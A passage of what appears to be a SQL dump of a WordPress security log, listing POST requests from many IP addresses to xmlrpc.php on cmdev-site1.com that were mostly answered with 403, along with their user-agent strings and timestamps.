AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','CD2hH0IeLV9OpaUJysSk7wT4',0,1681388386.5799,632,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Dc6HnMi9NRlSbGCq5wyrts4j',0,1681388383.3520,642,'','POST',403,0,515,0,1,'',0),('185.107.113.77',3110826317,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','CD9NxPts5ZSrYk3d2gmGBiRy',0,1681388369.4602,3991,'','POST',403,0,515,0,1,'',0),('144.24.39.81',2417502033,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','DTmRWX62OupIUzBEjcxH7hMN',0,1681388368.1651,5284,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','LJa7BYWwUZ2zQynNIFGSiDrE',0,1681388368.6762,4767,'','POST',403,0,515,0,1,'',0),('68.178.151.138',1152554890,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ACyv5JomnOWQs1jzhMiE9Vdl',0,1681387230.5725,593,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','MHBz1pFhoA5SiKg7JcO9mw6b',0,1681387216.6873,888,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ZofduOQFIHlDM2m4VvisJrCS',0,1681387207.9261,617,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','wjYSHVFG12Ne7yfvuBAW8iIE',0,1681387199.9717,1394,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','DFNsUbvgX6HT5JekaRui7lwZ',0,1681390967.1320,624,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','1RcD5LimwFKnZg9aOMTz0AvB',0,1681390952.1474,860,'','POST',404,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','lRPLEiCqrMxWe2Qy6FUTmwVX',0,1681390951.8560,1029,'','POST',404,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','PgOI3X19kz5BMGVACaFdD78w',0,1681390944.1041,604,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VqIaxXhYg7lLPcKd9oWCNnr1',0,1681390938.9372,593,'','POST',403,0,515,0,1,'',0),('51.178.95.118',867327862,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','bjHphD2GO9C5tVkAvN8FzUyW',0,1681390858.2642,6662,'','POST',403,0,515,0,1,'',0),('74.208.167.173',1255188397,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','oirmTbeV9ugf6XFLHxQGyhBR',0,1681390846.9465,1415,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','Ak3z72KhfCBD5S9WJVer0R6u',0,1681394628.4558,1138,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','aXwUmncLsWt7flD6dpIJHZ54',0,1681394627.2410,752,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','g1LjnG52YPrHWqSCxlMyo4u7',0,1681394628.0658,1273,'','POST',403,0,515,0,1,'',0),('141.138.169.246',2374674934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','XYCbdf91DqSGjmTv6HUu7aJz',0,1681419360.9763,805,'','POST',403,0,515,0,1,'',0),('5.9.178.235',84521707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','WfNYZQlzvhsVrMG2Ag7PXjuI',0,1681419362.9478,562,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','jkSl3xCQL8ur1R6yi4Fct2Ew',0,1681419360.2599,893,'','POST',403,0,515,0,1,'',0),('149.255.58.1',2516531713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','3hNvfSXrb0qYk62xwO4Ft97s',0,1681419352.9419,5121,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','lx67IMzpJy1HQGofVWntgYF2',0,1681419357.7550,761,'','POST',403,0,515,0,1,'',0),('45.32.194.40',757121576,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','aITkoLHhpUlVnZ6Afw7jugcd',0,1681426763.0631,1748,'','POST',403,0,515,0,1,'',0),('89.46.108.85',1496214613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','jGuZP0s8pg9U2BXhJFQb6vwY',0,1681426760.4649,4784,'','POST',403,0,515,0,1,'',0),('208.97.144.90',3496054874,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','LkM45ZUb2Y9pcwQuISGRXVsr',0,1681426800.2159,1387,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0HtPy6DSGfdTLUhs73AWrEmz',0,1681438506.4368,5039,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','BiANgSQzEKVwoJePC80Z9mh2',0,1681452957.1525,2794,'','POST',403,0,515,0,1,'',0),('100.26.105.1',1679452417,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','enjLEhpNgkFG4IyKzsW7Hm0M',0,1681475417.8240,582,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','7iLXu5VvxOQ8hfApBaJsjzPc',0,1681475407.4246,1449,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','qVpWt8isGaD1Zom7YUBTXdFH',0,1681475413.7368,585,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','VeFQOUJxbMYnvTfkw9ticXja',0,1681525887.5041,3957,'','POST',403,0,515,0,1,'',0),('157.7.188.161',2634529953,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fOQ3swv2rNIB6UTkFqe87c50',0,1681525886.0500,5404,'','POST',403,0,515,0,1,'',0),('202.172.26.49',3400276529,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Rp7t2bzluV6e1qJkIiHY5Q89',0,1681524073.6096,546,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','53iAPE1KhYIZf2egpqDC8j7x',0,1681524070.9510,586,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Geg17NJuFhziVQAOc9Sv42Xb',0,1681524064.2727,615,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','7MNmieTxua4LWYGZjvt0Qdfn',0,1681524052.7733,573,'','POST',403,0,515,0,1,'',0),('43.204.104.245',734816501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','4BaeiO3WtI5LojucF9QRThZK',0,1681524048.1312,561,'','POST',403,0,515,0,1,'',0),('74.208.59.164',1255160740,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','mI5vBWkLsTe3irOVRDZQFgH4',0,1681524038.7742,1584,'','POST',403,0,515,0,1,'',0),('74.208.59.234',1255160810,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','FnGrpd81NA0s3Vw9gv6TZCzo',0,1681524036.0605,3908,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Tw1KgXmF7302qrYJW4oucVHb',0,1681524036.7891,2358,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','4B7pSnsG8MQoCmRbdJqvVcaj',0,1681523266.4935,616,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','6bK3HG8aDepOVnogBtduirXF',0,1681523265.1442,594,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','F0myHGiqbDU1XZ4xzIPYo6LJ',0,1681523261.9777,590,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','s53mVybHM0QUKOuP4wikoXpB',0,1681523247.9696,595,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','bIHrhMRsTVuN7xqGPySJ5KXC',0,1681523245.1106,743,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','FAJs8qkL0bSTzauxhtQMCwWI',0,1681523234.2876,657,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','Y5h6V0wWoO7LPeMnX4dIfErx',0,1681523233.5365,629,'','POST',403,0,515,0,1,'',0),('194.163.34.111',3265471087,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','gylV3nQ2Tj8CGfZuW1wsrqeN',0,1681523221.9486,572,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','CIbre5Gx1VZHPjUTunv3qJiR',0,1681523212.8741,641,'','POST',403,0,515,0,1,'',0),('188.227.227.182',3169051574,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','P4NQRah9UyMdBH0FOu6ZqAIc',0,1681523195.1545,3665,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KPtIJEvwCXuZLSlUbgpNdf85',0,1681520451.3372,5117,'','POST',403,0,515,0,1,'',0),('190.104.235.180',3194547124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','XR3unjYFLiNUeI7yKOx0MkDA',0,1681519015.1429,545,'','POST',403,0,515,0,1,'',0),('185.162.31.237',3114409965,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','cyx71fkp4AmS8V5TQLjlqFgO',0,1681518997.1585,560,'','POST',403,0,515,0,1,'',0),('94.247.177.44',1593291052,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','BYgMUz541FRZDdG3yWQmLpqO',0,1681518994.3600,592,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','s938yUzeVwvjnTL5Xc1fAKkW',0,1681518984.3864,1458,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','FLZb6iDvjGQTJWPpU43gcVtf',0,1681518984.3435,1439,'','POST',403,0,515,0,1,'',0),('47.104.167.76',795387724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','zEHVXZFSvuTaPCgN28QxtBIJ',0,1681518979.4433,620,'','POST',403,0,515,0,1,'',0),('47.107.237.174',795602350,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','3foUgqGVIJHb1ZsWt0iw7BaT',0,1681518976.6087,586,'','POST',403,0,515,0,1,'',0),('39.104.85.137',661149065,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','tl8C3aPmAXnNux9QeVyshHLT',0,1681518974.4615,579,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','MAiRnQr8Ba7Gyb4Z1mUXP3ld',0,1681518971.6703,598,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','7qwIKDLSsmJWtvZcCjoM5dVO',0,1681518962.8303,3726,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','oO6UIARci349QTGPL8fuqS15',0,1681518964.9502,1512,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rjkTgiExfyVcSGp0XQ3hlFKo',0,1681532639.4403,4347,'','POST',403,0,515,0,1,'',0),('158.101.2.96',2657419872,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','BDmkxo9OsJPdLvwnzWHcaTMZ',0,1681533496.3351,2146,'','POST',403,0,515,0,1,'',0),('83.143.245.51',1401943347,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cqlKDS4weT639k7F0XOLJC2d',0,1681552967.3165,3597,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','vxqI2HDfJpZ1UyjScmdsrkYO',0,1681566245.8424,1826,'','POST',404,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','slPgQmH7YUE1ZC9yzMc5Gfrq',0,1681566252.3746,1314,'','POST',403,0,515,0,1,'',0),('68.178.225.144',1152573840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','7VHFsBG9OSyZ8jUalpRikfeg',0,1681566244.9751,2372,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0OhTxd4mHNkyXWR2Yv6VgZDJ',0,1681566241.3646,686,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KH8JPDjFbUy2IhV7d3ORELif',0,1681566236.0643,592,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','49zZmraR5278w1sKGXYCFxgP',0,1681566230.2726,2745,'','POST',403,0,515,0,1,'',0),('103.254.153.99',1744738659,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2pNTQW94w7xs5XHqFcruGyMd',0,1681565658.5561,902,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','9xstZzUyITM5AQ0NK6fPrnYL',0,1681566231.0702,1945,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KiPasNh795e0kTyuwbXGgzjc',0,1681642982.2454,596,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','jbQvFedAch5Rrxs8f1pKMSlE',0,1681642984.4085,636,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','X6HNr9d8pKDMJgfiEa5B2U7A',0,1681642991.3754,566,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','KZRPFTmNtsg0vVDyceLWGo5O',0,1681642967.9492,598,'','POST',403,0,515,0,1,'',0),('162.0.229.50',2717967666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','JNhu7yXHsDGm92ZTgAix84VQ',0,1681642960.1676,1132,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','KhG79XIUPE8xdS3rLABfHOJc',0,1681642959.8370,1225,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','c2hzHgABZ1Vy0Fe47XRuOqLf',0,1681642951.4632,687,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 